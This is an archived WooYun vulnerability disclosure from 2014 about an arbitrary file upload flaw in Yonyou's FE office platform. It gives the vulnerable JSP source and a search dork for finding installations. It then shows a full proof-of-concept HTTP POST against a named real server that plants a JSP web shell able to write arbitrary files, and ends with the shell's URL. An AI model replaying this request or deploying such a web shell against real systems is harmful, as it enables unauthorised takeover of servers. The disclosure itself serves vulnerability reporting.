乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-08-10: 细节已通知厂商并且等待厂商处理中 2014-08-15: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2014-10-09: 细节向核心白帽子及相关领域专家公开 2014-10-19: 细节向普通白帽子公开 2014-10-29: 细节向实习白帽子公开 2014-11-05: 细节向公众公开
上一枚: WooYun: 用友某办公平台任意文件上传导致代码执行漏洞(全版本) intitle:"fe协作"看问题代码在\system\mediafile\fileupload.jsp中
<%@ page contentType="text/html; charset=GBK" language="java" import="java.sql.*" errorPage="" %><%@ page import="java.io.*"%> <%@ page import="java.util.*"%> <%@ page import="fe.util.*"%> <%@ page import="fe.upload.*"%><jsp:directive.page import="fe.sys.User"/><jsp:directive.page import="fe.res.ResourceManage"/> <% String path = request.getParameter("path"); String state=request.getParameter("state"); request.setCharacterEncoding("GBK"); if(state==null || "".equals(state)){ UploadFile up=new UploadFile(request); up.setSavePath(path); String message=up.writeFile(true); %> <script language="javascript"> alert("<%=message%>"); var reloadSrc1=opener; var href=reloadSrc1.location.href; var index=href.indexOf("done"); if(index>0) href=href.substring(0,index); reloadSrc1.location.href=href; window.close(); </script> <% return; }%><HTML><HEAD><TITLE>文件选择</TITLE><meta http-equiv="Content-Type" content="text/html; charset=GBK"><style type="text/css">body, a, table, div, span, td, th, input, select{font:9pt;font-family: "宋体", Verdana, Arial, Helvetica, sans-serif;}body {padding:5px}</style><link href="/style1.css" rel="stylesheet" type="text/css"><script language="JavaScript" src="/js35/XHConn.js"></script><script language="JavaScript">//var filepath="";var img=null; function ok(){ var fileName=document.all.file1.value; if(fileName.indexOf("\\")!=-1) fileName=fileName.substring(fileName.lastIndexOf("\\")+1); if(fileName==null || fileName==""){ alert("请选择上传文件!"); return; } else{ if(fileName.toLowerCase().lastIndexOf(".doc")!=fileName.length-4){ alert("系统只是支持上传DOC文件,请选择其他文件!"); return; } var myConn = new XHConn(); if(myConn){ myConn.connect("checkfile.jsp", "POST", "type=file&fileName="+fileName+"&path=<%=path %>", checkName); } } } function checkName(oXML){ var state=oXML.responseText; if(state.indexOf("#hasFile")!=-1){ if(!window.confirm("文件已存在,是否覆盖?")){ return; } } document.all.form1.submit(); document.all.divProcessing.style.display="inline"; }</script><BODY bgColor="#E0F0FE" style="margin:0px;"><form name="form1" action="fileupload.jsp?path=<%=path %>" method="post" enctype="multipart/form-data"><table width="317" height="81" border=0 align=center cellpadding=0 cellspacing=0><tr> <td>上传文件不能大于10M(只能上传DOC文件)</td></tr><tr> <td width="317" height="56"> <fieldset> <legend>文件来源</legend> <table border=0 cellpadding=0 cellspacing=0 width="100%"> <tr> <td align="right"><input type="file" name="file1" id="file1"size="35"></td> </tr> </table> </fieldset> </td></tr><tr><td height=5> </td></tr><tr><td height=5> </td></tr><tr><td height="20" align=right><input class="singleInputButton" type="button" value=' 确定 ' id=Ok onclick="ok()"> <input class="singleInputButton" type=button value=' 取消 ' onclick="window.close();"></td></tr></table></form><div id=divProcessing style="width:200px;height:30px;position:absolute;left:70px;top:30px;display:none"><table border=0 cellpadding=0 cellspacing=1 bgcolor="#000000" width="100%" height="100%"><tr><td bgcolor=#3A6EA5><marquee align="middle" behavior="alternate" scrollamount="5"><font color=#FFFFFF>...文件上传中...请等待...</font></marquee></td></tr></table></div></body></html>
分析如下:
String path = request.getParameter("path");//获取路径 String state=request.getParameter("state");//状态 request.setCharacterEncoding("GBK"); if(state==null || "".equals(state)){ UploadFile up=new UploadFile(request); //直接获取reuqest包 up.setSavePath(path); //保存到目标路径
利用证明如下:
POST /system/mediafile/fileupload.jsp?path=D:\FE\jboss\server\default\.\deploy\fe.war\ HTTP/1.1Host: oa.peizheng.net.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://oa.peizheng.net.cn/system/mediafile/fileupload.jsp?path=1&state=2Cookie: JSESSIONID=197566F74F854A9E06551298A76CCCE8Connection: keep-aliveContent-Type: multipart/form-data; boundary=---------------------------155811815622246Content-Length: 2215-----------------------------155811815622246Content-Disposition: form-data; name="file1"; filename="test.jsp"Content-Type: application/msword<%@page contentType="text/html;charset=gb2312"%> <%@page import="java.io.*,java.util.*,java.net.*"%> <html> <head> <title>JspDo Code By Xiao.3</title> <style type="text/css"> body { color:red; font-size:12px; background-color:white; } </style> </head> <body> <% if(request.getParameter("context")!=null) { String context=new String(request.getParameter("context").getBytes("ISO-8859-1"),"gb2312"); String path=new String(request.getParameter("path").getBytes("ISO-8859-1"),"gb2312"); OutputStream pt = null; try { pt = new FileOutputStream(path); pt.write(context.getBytes()); out.println("<a href='"+request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+request.getRequestURI()+"'><font color='red' title='µã»÷¿ÉÒÔתµ½ÉÏ´«µÄÎļþÒ³Ãæ!'>ÉÏ´«³É¹¦!</font></a>"); } catch (FileNotFoundException ex2) { out.println("<font color='red'>ÉÏ´«Ê§°Ü!</font>"); } catch (IOException ex) { out.println("<font color='red'>ÉÏ´«Ê§°Ü!</font>"); } finally { try { pt.close(); } catch (IOException ex3) { out.println("<font color='red'>ÉÏ´«Ê§°Ü!</font>"); } } } %> <form name="frmUpload" method="post" action=""> <font color="blue">±¾ÎļþµÄ·¾¶:</font><%out.print(request.getRealPath(request.getServletPath())); %> <br> <br> <font color="blue">ÉÏ´«Îļþ·¾¶:</font><input type="text" size="70" name="path" value="<%out.print(getServletContext().getRealPath("/")); %>"> <br> <br> ÉÏ´«ÎļþÄÚÈÝ:<textarea name="context" id="context" style="width: 51%; height: 150px;"></textarea> <br> <br> <input type="submit" name="btnSubmit" value="Upload"> </form> </body> </html> -----------------------------155811815622246--
shell直接在根目录当中,为test.jsphttp://oa.peizheng.net.cn/test.jsp
http://oa.peizheng.net.cn/test.jsp
危害等级:无影响厂商忽略
忽略时间:2014-11-05 17:58
暂无